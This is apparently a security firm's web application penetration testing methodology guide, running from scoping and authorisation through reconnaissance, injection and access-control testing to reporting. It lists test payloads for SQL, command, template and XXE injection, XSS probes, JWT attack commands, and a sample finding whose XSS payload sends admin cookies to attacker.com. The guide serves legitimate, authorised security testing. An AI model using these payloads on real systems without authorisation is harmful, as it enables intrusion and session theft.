Web application penetration testing is a systematic simulation of how a real attacker would approach your web application. Unlike a vulnerability scan — which identifies known weaknesses using signatures — a pentest uses human intelligence and attacker techniques to discover, chain, and exploit vulnerabilities that automated tools routinely miss.
This guide documents the methodology used by professional web application penetration testers, step by step, from initial scoping to final report. It’s written for security engineers, development teams, and security leaders who want to understand what happens during an engagement — and how to make the most of one.
Phase 0: Scoping and Rules of Engagement
A pentest without a well-defined scope is a liability. Before any testing begins, establish:
Scope Definition
In-scope targets:
- Application URLs and domains (e.g.,
app.example.com,api.example.com) - Specific user roles to test (unauthenticated, standard user, admin, API consumer)
- Mobile apps, if any
- Third-party integrations (SSO providers, payment gateways)
Out-of-scope:
- Third-party services you don’t own (be specific about subdomains)
- Production databases if testing in a non-prod environment
- Social engineering (unless explicitly agreed)
- Denial of service testing
Testing type:
- Black box: No prior knowledge — simulate an external, unauthenticated attacker
- Grey box: Partial knowledge (accounts, some architecture) — most efficient for web apps
- White box: Full access (source code, architecture docs) — deepest coverage. Pair with source code security review for maximum assurance
Authorisation
Get written authorisation before touching anything. This is non-negotiable — a penetration test without written authorisation is unauthorised access, regardless of intent. The authorisation should:
- Name the specific systems and URLs in scope
- Define the testing window (start and end dates/times)
- Specify permitted and prohibited testing techniques
- Include contact information for emergency escalation
Emergency Contacts
Define who to call if:
- The tester discovers evidence of an active compromise (not theirs) during testing
- Testing causes unintended disruption to production systems
- A critical vulnerability is found that needs immediate remediation
Phase 1: Reconnaissance
Reconnaissance is intelligence gathering — understanding the target before touching it. Split into passive (no direct interaction with the target) and active (interacting with the target).
Passive Reconnaissance
OSINT (Open Source Intelligence):
# DNS enumeration with passive sources
subfinder -d example.com -o subdomains.txt
amass enum -passive -d example.com >> subdomains.txt
# Historical DNS records
dnshistory.org, securitytrails.com, viewdns.info
# Certificate transparency logs (find subdomains from TLS certs)
curl -s "https://crt.sh/?q=%.example.com&output=json" | jq '.[].name_value' | sort -u
# Google dorking
site:example.com filetype:pdf
site:example.com inurl:admin
site:example.com "internal use only"
"@example.com" site:linkedin.com # employee enumeration
# Technology fingerprinting
# Check Wappalyzer, BuiltWith — what tech stack is in use?
# Shodan (for exposed infrastructure)
shodan search "hostname:example.com"
shodan search "ssl:example.com"
# Wayback Machine (historical content, old endpoints, old config files)
gau example.com | grep -v "\.js\|\.css\|\.png\|\.jpg" | sort -u
# GitHub/GitLab code search
# Search for hardcoded API keys, config files, internal domains
What you’re looking for:
- Subdomains (staging, dev, api, admin, legacy)
- Technology stack (framework, server, CDN)
- Employee names and email formats (useful for targeted attacks)
- Exposed credentials in code repositories
- Historical endpoints no longer linked from the main app
Active Reconnaissance
Once you’re within the testing window:
# Port scanning (agreed-scope IPs/domains only)
nmap -sS -sV -p- --min-rate 5000 --open -oA nmap-scan app.example.com
# Web crawling
katana -u https://app.example.com -d 5 -jc -o crawl-results.txt
gospider -s https://app.example.com -d 3 -o ./spider-output
# Directory and file enumeration
ffuf -u https://app.example.com/FUZZ -w /path/to/SecLists/Discovery/Web-Content/raft-large-files.txt \
-fc 404 -fs 0 -mc all -o dir-brute.json
# API endpoint discovery
kiterunner scan https://api.example.com -w routes-large.kite
# JavaScript analysis (extract API endpoints, secrets, internal URLs)
# Download all JS files from spider results
# Analyse with LinkFinder, SecretFinder
Phase 2: Authentication and Session Testing
Authentication is typically the highest-value target. A bypass here gives attacker-level access to everything protected by it.
Login Endpoint Analysis
1. What authentication mechanisms exist?
- Username/password
- OAuth2/OIDC (SSO)
- API keys
- Magic links
2. Username enumeration
- Do error messages differ for "user not found" vs "wrong password"?
- Is there timing difference? (blind enumeration via response time)
- Does "forgot password" confirm whether an email exists?
3. Brute force protections
- What happens after N failed attempts?
- Is there a lockout, CAPTCHA, or rate limit?
- Is the limit per-IP, per-account, or both?
- Can it be bypassed with X-Forwarded-For header manipulation?
4. Password policy
- Minimum length?
- Is "password123" accepted?
5. MFA implementation
- Is MFA bypass possible (skip the MFA step entirely)?
- Is the MFA code validated server-side?
- Can codes be brute-forced (are they rate-limited)?
Session Token Analysis
Capture session tokens from authenticated sessions, then:
# Analyse token entropy (should look random, not predictable)
# Decode JWTs
jwt_tool <token>
# Test JWT attacks
jwt_tool <token> -T # Tamper mode
jwt_tool <token> -X a # alg:none attack
jwt_tool <token> -C -d /path/to/wordlist # Crack weak signing key
# Session fixation — does the session token change after login?
# Set session cookie before login, log in, does the same token persist?
# Session invalidation — does logout actually invalidate the server-side session?
# Capture session token, logout, try to use the token again
Phase 3: Authorisation Testing
Authorisation testing is where significant business impact is most often found. Two accounts are required for most tests.
IDOR (Insecure Direct Object Reference) Testing
For every endpoint that returns or modifies a specific resource:
1. Note the resource ID (numeric, UUID, slug)
2. Create a second test account
3. Capture the second account's resource IDs
4. Use account A's session to request account B's resources
5. Does the server return/allow modification?
Example:
Account A: GET /api/projects/8824 → returns project data
Account B owns project 9141
Test: GET /api/projects/9141 with Account A's token → should return 403, not project data
Automate this with Burp Suite’s Autorize extension — it replays every request in the proxy history with a different session token and flags differences in response.
Privilege Escalation Testing
1. Horizontal escalation: Account A accessing Account B's data (IDOR)
2. Vertical escalation: Regular user accessing admin functions
For vertical escalation:
- Try admin API endpoints with regular user credentials
- Modify request parameters: role=user → role=admin
- Try adding admin headers (X-Admin: true, X-User-Role: admin)
- Access admin UI pages directly (not just via navigation)
Phase 4: Input Validation and Injection Testing
Every input is a potential injection point. Test systematically:
Injection Testing Matrix
For every user-controlled input (form fields, URL parameters, headers, cookies, JSON/XML body):
| Test | Payload Example | What You’re Looking For |
|---|---|---|
| SQL Injection | ' OR '1'='1, 1; SELECT sleep(5)-- | DB errors, timing differences, extra data |
| NoSQL Injection | {"$gt": ""}, {"$where": "sleep(3000)"} | Auth bypass, data exposure |
| Command Injection | ; whoami, $(id), \id“ | RCE indicators in response |
| Template Injection | {{7*7}}, ${7*7}, <%= 7*7 %> | 49 returned = SSTI |
| Path Traversal | ../../etc/passwd, ..%2F..%2Fetc%2Fpasswd | File contents in response |
| SSRF | http://169.254.169.254/, http://internal.service/ | Internal data returned |
| XXE | <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> | File contents in response |
| CRLF Injection | %0d%0aHeader: Value | Header injected in response |
XSS Testing
// Basic reflected XSS probes
<script>alert(1)</script>
<img src=x onerror=alert(1)>
"><script>alert(1)</script>
javascript:alert(1)
"><img src=x onerror=alert(document.domain)>
// DOM XSS — look at JavaScript code for dangerous sinks
document.innerHTML
document.write
eval()
setTimeout(user_input)
location.href = user_input
For stored XSS: submit payloads in all user-controllable fields that are later rendered to other users (profile names, comments, titles, custom fields).
Phase 5: Business Logic Testing
Business logic vulnerabilities require understanding your application’s specific workflows. They cannot be found by automated scanners.
Common Business Logic Flaws
Multi-step flow bypass:
1. Map every multi-step process (checkout, signup, verification, approval)
2. Try accessing later steps directly without completing earlier ones
3. Try re-submitting completed steps (replay attacks)
4. Try completing steps in a different order
Race conditions:
# Test concurrent requests for resource-limited operations
import threading, requests
def claim_resource():
return requests.post('/api/claim-voucher',
json={'code': 'LIMITEDONE'},
headers={'Authorization': 'Bearer ' + token})
threads = [threading.Thread(target=claim_resource) for _ in range(20)]
[t.start() for t in threads]
[t.join() for t in threads]
# If more than 1 succeeds → race condition
Price and quantity manipulation:
- Negative quantities in cart
- Zero-price items
- Discount codes applied multiple times
- Currency rounding exploitation
- Coupon stacking when only one should be allowed
Phase 6: API-Specific Testing
Modern web applications are API-first. Our API penetration testing service covers this in depth — summary of key tests:
- GraphQL introspection and schema enumeration
- Mass assignment in PUT/PATCH requests
- HTTP method tampering (GET endpoint accepting DELETE)
- Parameter pollution (sending duplicate parameters)
- Verb tampering (OPTIONS, TRACE, HEAD revealing internal information)
Phase 7: Infrastructure and Configuration Testing
Beyond the application itself:
# HTTP security headers
curl -I https://app.example.com | grep -i "strict-transport\|x-content\|x-frame\|content-security\|referrer"
# TLS configuration
testssl.sh https://app.example.com
sslyze --regular app.example.com
# Information disclosure
# Check for: stack traces, version numbers in responses, debug headers
# robots.txt, sitemap.xml — may reveal hidden paths
# .git/ exposed? — git history may contain secrets
curl https://app.example.com/.git/HEAD
# .env, config.php, database.yml exposed?
curl https://app.example.com/.env
Phase 8: Post-Exploitation (Within Agreed Scope)
When access is achieved, demonstrate business impact:
1. What data can be accessed?
- Other users' data (PII, financial records, communications)
- Admin data (configurations, all user accounts)
- Internal infrastructure information
2. What actions can be performed?
- Can we modify another user's data?
- Can we escalate to admin?
- Can we exfiltrate data at scale?
3. Document without causing harm
- Do not exfiltrate real user data — capture screenshots with minimal real data visible
- Do not destroy data
- Do not persist access (no backdoors, no changed passwords)
- Document the attack chain precisely for the report
Phase 9: Reporting
The report is what the client pays for. A poor report negates a strong technical finding.
Executive Summary
Non-technical. Maximum 1–2 pages. Covers:
- Overall risk rating (Critical / High / Medium / Low)
- Number of findings by severity
- Key themes and most impactful findings in plain language
- Business risk narrative — what could happen if these aren’t fixed
- Top 3 recommended immediate actions
Technical Findings
For each finding:
Finding: Stored XSS via Profile Display Name
| Field | Value |
|---|---|
| Severity | High |
| CVSS Score | 7.4 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N) |
| Affected Endpoint | PUT /api/users/profile → GET /api/users/{id} |
| CWE | CWE-79: Improper Neutralisation of Input During Web Page Generation |
Description: The display_name field in user profile update requests is not sanitised before being rendered in the admin user list view. An authenticated user can inject arbitrary JavaScript that executes in admin sessions.
Steps to Reproduce:
- Authenticate as a standard user
- Send:
PUT /api/users/profilewith body{"display_name": "<img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>"} - An administrator views the user list
- The JavaScript executes in the admin’s browser, exfiltrating their session cookie
Impact: An attacker could steal administrator session cookies, gain admin-level access, and access all user data, configuration settings, and sensitive system information.
Remediation:
- Encode all user-supplied data when rendering in HTML contexts (use template engine auto-escaping or
htmlspecialchars()in PHP,DOMPurifyfor rich text) - Implement a Content Security Policy (CSP) as defence in depth
- Apply
HttpOnlyflag to admin session cookies to prevent cookie theft via XSS
Attack Narrative
Walk through the most impactful attack chain as a story:
“Starting from an unauthenticated position, the tester enumerated the application’s API endpoints and discovered an undocumented endpoint at /api/v1/admin/users/export. Authentication was required, but the endpoint accepted a JWT token with modified claims. Using a known-weak signing key attack, the tester forged an admin JWT token. The endpoint returned a CSV file containing all 14,000 registered user records including names, email addresses, and hashed passwords.”
This narrative form communicates impact to executives far more effectively than a list of technical findings.
Remediation Roadmap
Don’t just list what’s broken. Provide a prioritised action plan:
| Priority | Finding | Effort | Impact |
|---|---|---|---|
| 1 (Immediate) | Stored XSS in admin panel | Low — 4 hours | Critical |
| 2 (This Sprint) | IDOR on invoice API | Low — 2 hours | High |
| 3 (This Sprint) | No rate limiting on login | Low — 1 hour | High |
| 4 (Next Sprint) | Missing security headers | Low — 2 hours | Medium |
| 5 (Quarterly) | JWT library upgrade | Medium — 1 week | Medium |
Making the Most of a Pentest Engagement
To get maximum value:
Before the test:
- Ensure test accounts are created with relevant roles and data
- Have developers available to answer questions during the test
- Decide whether to inform your SOC (blue team) or test their detection capability simultaneously
During the test:
- Create a shared channel (Slack/Teams) with the testers for quick communication
- Brief daily stand-ups help track progress and redirect effort to high-value areas
- Share architecture documentation in grey/white box engagements — testers who understand the system find more
After the test:
- Schedule a debrief session to walk through findings with technical teams
- Prioritise remediation using the roadmap
- Schedule a retest to validate fixes
- Use findings to update your threat model and developer security training
CyberneticsPlus conducts web application penetration testing following OWASP, PTES, and custom methodology refined through hundreds of engagements. We also offer API penetration testing and source code security review for comprehensive coverage. Contact us to scope your next assessment.